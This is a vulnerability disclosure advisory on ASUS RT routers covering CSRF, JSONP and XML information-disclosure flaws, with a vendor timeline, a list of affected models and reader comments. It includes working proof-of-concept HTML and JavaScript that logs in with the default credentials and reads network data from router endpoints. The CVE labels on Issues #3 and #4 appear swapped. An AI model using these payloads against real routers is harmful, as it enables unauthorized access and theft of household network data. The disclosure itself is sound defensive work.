Multiple Vulnerabilities in ASUS Routers

Summary

Various models of ASUS RT routers have several CSRF vulnerabilities that allow malicious sites to log in and change settings in the router, multiple JSONP vulnerabilities that allow exfiltration of router data, and an XML endpoint that reveals WiFi passwords.

Most of these issues have been fixed by Asus in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure – CVE-2017-5892) remains unfixed since the vendor doesn’t consider it to be a security threat [UPDATE: Asus will be fixing this]

CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the JSONP disclosure without login issue. [ADDED 05/11/2017: Two additional CVEs have been issued to cover JSONP issues after login – CVE-2017-8877 – and the XML information disclosure issue – CVE-2017-8878].

[ADDED 05/28/2017: As reported in comments below, multiple other models may be affected; please review the list below for details on what is affected, and whether patches are available]

Vulnerability Details

RT routers from ASUS, like many other routers, come with a built-in web interface that is accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that can facilitate attacks on the router, either via a malicious site visited by a user on the same network, or via a malicious mobile or desktop application running on the same network.

For the CSRF vulnerabilities, a user would need to visit a malicious site, which can then try to log in and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as a matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit.

NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or determined via JavaScript APIs like WebRTC. For desktop and mobile applications, determining the gateway address should be trivial to implement.

Issue #1 – Login Page CSRF (CVE-2017-5891)

The login page for the router doesn’t have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user’s knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn’t changed the default credentials (“admin / admin”). To exploit, submit the base64-encoded username and password as the “login_authorization” field of a form POST to the router’s “/login.cgi” URL.

Example of a form that can exploit this issue (uses default credentials):

<form action="http://192.168.1.1/login.cgi"
   method="post" target="_blank">
<input name="login_authorization" type="text"
   value="YWRtaW46YWRtaW4=" />
<input type="submit" /></form>

Issue #2 – Save Settings CSRF (CVE-2017-5891)

The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user’s knowledge.

NOTE: We have not been able to exploit this issue consistently.

Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-8877)

Two JSONP endpoints exist within the router that allow a page to detect which ASUS router model is running and disclose some information. No login to the router is required. The vendor doesn’t consider these endpoints a security threat. [ADDED 05/11/2017: A project named Sonar.JS exists on Github that describes how to use this together with WebRTC to figure out which router the user is running. This project is an example of what is possible with an endpoint like this one.]

The endpoints are as follows:

  • /findasus.json
    • Returns the router model name, SSID name and the local IP address of the router
      • iAmAlive([{modelName: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])
  • /httpd_check.json
    • Returns: {"alive": 1, "isdomain": 0}

Exploit code as follows:

// Callback invoked by the findasus.json response; any page that defines it receives the payload
function iAmAlive(payload) {
  window.alert("Result returned: " + JSON.stringify(payload));
}
// Load each unauthenticated endpoint as a SCRIPT tag from a cross-origin page
function alert1() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/findasus.json';
  document.getElementsByTagName('head')[0].appendChild(script);
}
function alert2() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/httpd_check.json';
  document.getElementsByTagName('head')[0].appendChild(script);
}

Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-5892)

There exist multiple JSONP endpoints within the router interface that reveal various data from the router, including WAN status, surrounding access points, the network map of connected devices, the external IP address and WebDAV information.

Below is a list of endpoints and exploit code:

/status.asp – Network Information

// Load status.asp as a script; it defines the wanlink_* functions used below
function getstatus() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/status.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}
// Read the WAN link details from the functions defined by the loaded script
function show_wanlink_info() {
    var obj = {};
    obj.status = wanlink_status();
    obj.statusstr = wanlink_statusstr();
    obj.wanlink_type = wanlink_type();
    obj.wanlink_ipaddr = wanlink_ipaddr();
    obj.wanlink_xdns = wanlink_xdns();
    window.alert(JSON.stringify(obj));
}

<br/>
<button onClick="getstatus()">Load Status script</button>
<button onClick="show_wanlink_info()">Show wanlink info</button>
<br/><br/>

/wds_aplist_2g.asp – Surrounding access points, 2.4 GHz band

/wds_aplist_5g.asp – Surrounding access points, 5 GHz band


// Each wds_aplist_*.asp script defines the global wds_aplist with the scan results
function getwds_2g() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/wds_aplist_2g.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}
function getwds_5g() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/wds_aplist_5g.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}

<br/>
<button onClick="getwds_2g()">Load 2G info</button>
<button onClick="getwds_5g()">Load 5G info</button>
<button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button>
<br/><br/>

/update_networkmapd.asp – Network map of devices on the network

// update_networkmapd.asp defines the global fromNetworkmapd with the device list
function getmap() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/update_networkmapd.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}

<br/>
<button onClick="getmap()">Load Network map</button>
<button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button>
<br/><br/>

/update_clients.asp – Origin data

// update_clients.asp appends to the global originData, so reset it before each load
function getorigin() {
    originData = [];
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/update_clients.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}

<br/>
<button onClick="getorigin()">Load Origin</button>
<button onClick="window.alert(JSON.stringify(originData))">Show Origin</button>

/get_real_ip.asp – External IP address

// get_real_ip.asp defines the global wan0_realip_ip with the external address
function getrealip() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/get_real_ip.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}

<br/>
<button onClick="getrealip()">Load IP</button>
<button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button>

/get_webdavInfo.asp – WebDAV information

// get_webdavInfo.asp defines the globals pktInfo and webdavInfo
function getwebdav() {
    var script = document.createElement('script');
    script.src = 'http://192.168.1.1/get_webdavInfo.asp';
    document.getElementsByTagName('head')[0].appendChild(script);
}

<br/>
<button onClick="getwebdav()">Load WebDav</button>
<button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button>
<button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 2</button>
<br/><br/>

Issue #5 – XML Endpoint Reveals WiFi Passwords (CVE-2017-8878)

An XML endpoint exists in the router which reveals the router’s WiFi password. Fully exploiting this issue requires a mobile or desktop application running on the local network, since XML cannot be loaded cross-origin in the browser. The endpoint requires login and can be accessed at the following URL:

[router IP]/WPS_info.xml

Mitigation Steps / Vendor Response

Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher (except for 4G-AC55U which has no patches available).

There is no mitigation available for the issue #3 – JSONP information disclosure without login.

Affected models include the following ASUS routers; the list is not exhaustive:

  • 4G-AC55U – [ADDED 05/10/2017, patches are available as of 06/13/2017]
  • RT-AC51U
  • RT-AC52U B1 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC53 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC53U
  • RT-AC55U
  • RT-AC56R
  • RT-AC56S
  • RT-AC56U
  • RT-AC58U – [ADDED 05/28/2017: As reported by a commenter below, this one is also affected] [ADDED 06/15/2017 – firmware update now available]
  • RT-AC66U
  • RT-AC68U
  • RT-AC68UF – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC66R
  • RT-AC66U
  • RT-AC66W
  • RT-AC68W
  • RT-AC68P
  • RT-AC68R
  • RT-AC68U
  • RT-AC87R
  • RT-AC87U
  • RT-AC88U – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC1200 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC1750 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-AC1900P
  • RT-AC3100
  • RT-AC3200
  • RT-AC5300
  • RT-AC1200G+ – [ADDED 06/15/2017: based on a comment below]
  • RT-ACRH13 – [ADDED 05/28/2017: As reported by a commenter below, this one is also affected and has no patches]
  • RT-N11P
  • RT-N12 (D1 version only)
  • RT-N12+
  • RT-N12E
  • RT-N16 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-N18U
  • RT-N56U
  • RT-N66R – [07/20/2017 – as per commenter below, new firmware was released on July 17th, 2017 – v3.0.0.4.380.7743]
  • RT-N66U (B1 version only)
  • RT-N66W
  • RT-N300 – [ADDED 05/10/2017 based on Asus Firmware updates]
  • RT-N600 – [ADDED 05/10/2017 based on Asus Firmware updates]

References

CVE-IDs: CVE-2017-5891, CVE-2017-5892, CVE-2017-8877 and CVE-2017-8878

CERT/CC Tracking # VR-627

Credits

We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich.

Timeline

2017-01-21: Initial contact with the vendor
2017-01-23: Initial contact with CERT/CC
2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested
2017-02-10: Vulnerability analysis received from the vendor
2017-02-12: Beta firmware provided by the vendor to test fixes
2017-02-12: Vendor fixes confirmed
2017-03-31: Fixed firmware released publicly by the vendor
2017-05-01: Draft advisory shared with the vendor and CERT/CC
2017-05-09: Public disclosure

24 thoughts on “Multiple Vulnerabilities in ASUS Routers”

  1. The Asus 4G-AC55U router is also affected by the issues listed in the article but it did not receive a firmware fix.

    The router is based on the same AsusWRT firmware as the RT series, just has a 4G LTE modem built in. The latest version 3.0.0.4.378.8150 was published a year ago on 2016-05-20 on the download page at https://www.asus.com/Networking/4G-AC55U/HelpDesk_Download/.

    I tested all the vulnerabilities listed above and can confirm they are present.

    Please update the article to warn the 4G-AC55U owners and pass this information to the vendor if possible.

  2. The JSONP Information Disclosure looks more like Cross-Site Script Inclusion (XSSI) as the URLs do not accept a user supplied callback parameter.

  3. RT-N56U last firmware update was 1/12/2017 as ver. 3.0.0.4.376.3754

    but I’m running ver. 3.0.0.4.378_4850 (more current than official?)

    wondering if I’m hacked?

  4. Can I assume the T-Mobile version of the RT-AC1900 is also affected – TM-AC1900? Its firmware remains stuck at an earlier version.

  5. I changed the SSL port on my RT-AC1900P to 8443. I tried to login using the standard HTTP:80 combo, and the router identifies itself as RT-N66U. The page shouldn’t resolve at all, but it seems the firmware has another flaw. Furthermore, the page will only render with Chrome on Windows 10 (1703). Firefox, IE, Edge show a connection error. A connection error is displayed via Chrome/Safari/Firefox from macOS as well. The ASUSRouter iOS app will no longer connect to the router, which could be a separate issue. Hopefully there are no vulnerabilities with this configuration. Can anyone confirm?

  6. Hey @nightwatchcyber

    Add this one to the list as well, RT-AC58U (or in the U.S. (and maybe other markets): RT-ACRH13).
    Verified manually with the CVE details and exploit code you have available, and the firmware version is also lower than the referenced 3.0.0.4.380_6516, no newer one is available as of yet.

    • Update: I’ve contacted ASUS support via email, and they’ve informed me that there’s no ETA for the availability of a new firmware to fix these issues on this device (RT-AC58U/RT-ACRH13)

      • Update: ASUS has released an update for the RT-AC58U. Should have the fixes implemented.

        ASUS RT-AC58U Firmware version 3.0.0.4.380.7485
        Add
        – Tx power adjust option
        – New Zealand ISP support
        – IPTV – HiNet MOD profile
        – Reboot Schedule support

        Optimization
        – Wireless 5GHz band performance
        – Wired performance in AP mode
        – Reduce system RAM usage
        – The max number of client connections

        Bug Fixes
        – Fixed system crash issue

        Please unzip the firmware file first then check the MD5 code.
        MD5: 71e06b665f988359a8b5f05c9bd00fbd

      • I believe it should, haven’t tested all yet. But the CVE-2017-5891 goes to the login page instead of logging in, so I’d say yes.

  7. Updated my RT-N16 to firmware ver. 3.0.0.4.380_7378 and can no longer get ports to negotiate a gigabit connection. ASUS support solution is to revert back. Heard of anyone else having this issue?

  8. 4G-AC55U has now new version of the firmware (3.0.0.4.380.7633). It should include fixes to the security problems.

  9. ASUS RT-N66R Firmware version 3.0.0.4.380.7743 (July 17, 2017)
    Security fixed
    – Fixed CVE-2017-5892 (JSONP Information Disclosure)

    (among others)

  10. Hi,
    Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-5892)
    Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-8877)
    About above vulnerability, is there any typo about the CVE id?

    I have double-checked the pdf from the link below:

    Click to access bsides_fall_2017.pdf

    Looks like,
    Issue #3 – JSONP Information Disclosure Without Login (CVE-2017-5892)
    – CVE should be CVE-2017-8877?
    Issue #4 – JSONP Information Disclosure, Login Required (CVE-2017-8877)
    – CVE should be CVE-2017-5892?

    Regards.
